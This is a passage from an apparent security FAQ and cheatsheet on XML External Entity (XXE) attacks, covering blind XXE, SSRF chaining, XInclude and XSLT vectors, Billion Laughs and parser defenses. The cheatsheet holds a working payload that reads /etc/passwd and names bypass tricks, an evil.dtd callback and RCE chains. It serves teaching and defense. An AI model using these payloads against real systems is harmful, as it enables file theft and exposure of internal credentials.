A vulnerability in XML parsers where the parser resolves external entities defined in the DTD. The attacker specifies a URI via SYSTEM — the parser automatically fetches the file or URL contents and substitutes them into the document. This isn't a bug in application code — it's the design of the XML specification from 1998, which most parsers support by default.
2. What's the key prerequisite for XXE?
The parser must process DTD (Document Type Definition) and support external entities. No DTD means no entity declarations means no XXE. If DOCTYPE is prohibited at the parser level — the attack is impossible (except for XInclude, which works without DTD).
3. What's the typical impact of XXE?
Reading arbitrary files (file:///etc/passwd, configs, SSH keys, .env), SSRF to internal services and cloud metadata (IAM keys), DoS via Billion Laughs. In rare cases — RCE via expect:// (PHP) or a deserialization chain. Blind XXE adds OOB exfiltration and error-based data leaks.
4. How does XXE differ from regular XML injection?
XML injection is about manipulating the structure of an XML document (inserting tags, changing values). XXE exploits the parser's own capabilities through DTD and entities. XXE doesn't change XML logic — it makes the parser load external resources. These are different levels of attack: injection works with data, XXE works with the parsing mechanism.
5. What is blind XXE?
A situation where the parser resolves external entities, but the result isn't displayed in the response. Exploitation goes through three channels: OOB (out-of-band) — sending data via HTTP/DNS request to the attacker's server using parameter entities and an external DTD; error-based — triggering an error whose text contains the data; redefining an entity from a local system DTD when outbound connections are blocked.
6. How does XXE turn into SSRF?
Replace file:// with http:// in the SYSTEM URI. The parser makes an HTTP request to the specified address — including internal addresses (169.254.169.254 for cloud metadata, localhost:PORT for internal services). XXE is one of the simplest vectors for SSRF, because the parser makes the request automatically.
7. Why is "we blocked DOCTYPE" not always the end of the story?
XInclude doesn't require DOCTYPE — it works through an XML namespace and can be injected even when the attacker only controls part of the XML document. XSLT transformations use document() to load external resources — a separate vector, unrelated to DTD. SVG, DOCX, XLSX are XML formats that may be processed by other parsers with different settings.
8. Why is it dangerous to rely on "our parser is safe by default"?
Java DocumentBuilderFactory is vulnerable by default even in Java 17+. PHP with the LIBXML_NOENT flag enables entity substitution (the name is misleading). Python xml.etree.ElementTree doesn't support external entities but is vulnerable to Billion Laughs. Every parser requires checking the specific version and configuration — there's no universal "safe by default".
9. What is Billion Laughs and why is it discussed alongside XXE?
An attack based on nested entities where each level references the previous one 10 times — exponential expansion. 9 levels of nesting = 10^9 copies of the string "lol" — gigabytes in parser memory. Doesn't leak data, but confirms DTD processing (if Billion Laughs works — the parser processes entities, you can try XXE). Some parsers are protected against external entities but vulnerable to Billion Laughs.
10. What does proper XXE defense look like?
Disable DTD entirely at the parser level (disallow-doctype-decl in Java, DtdProcessing.Prohibit in .NET). Don't filter input data: filters get bypassed (UTF-16, parameter entities). Don't use XML where JSON would work. Check parsers for all formats that can contain XML: SVG, DOCX, XLSX, SAML. Track specific library versions and their defaults, and don't rely on "probably safe".
17. Quick Reference Cheatsheet
XXE = parser resolves external entities from DTD
Entities:
internal/external — where the value comes from
general (&name;) / parameter (%name;) — where it's used
Parameter entities → for blind XXE (work inside DTD)
Parameter entities in internal DTD subset are restricted →
need external DTD (or the local DTD trick)
Where: XML API, SOAP, SVG, DOCX/XLSX, Content-Type swap JSON→XML,
SAML, GPX, XHTML, PDF generation from XSLT
Types:
Classic → response visible, SYSTEM "file:///..."
Blind OOB → parameter entities + evil.dtd → HTTP callback
Error-based → data in the error message (when OOB is blocked)
Local DTD → entity redefinition from system DTD (no outbound)
XInclude → no control over DOCTYPE
XSLT → document() for file read and HTTP (no DTD)
Payload (basic):
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>
Bad characters (< &):
PHP → php://filter/convert.base64-encode/resource=...
General → CDATA wrapper via parameter entities
Java → jar:// to bypass restrictions
Chains:
XXE→SSRF, XXE→LFI, XXE→RCE (expect://),
Blind XXE+DNS, SSRF→XXE
Targets: /etc/passwd, .env, SSH keys, cloud metadata, internal APIs
Defense:
Disable DTD entirely (disallow-doctype-decl)
LIBXML_NOENT → ENABLES substitution (trap!)
Java is vulnerable by default even in 17+
Python xml.etree — no external entities, but has Billion Laughs
Don't filter — disable. Not XML — JSON.
Severity: files with secrets / cloud keys = critical,
/etc/passwd = high, blind = medium, DoS = low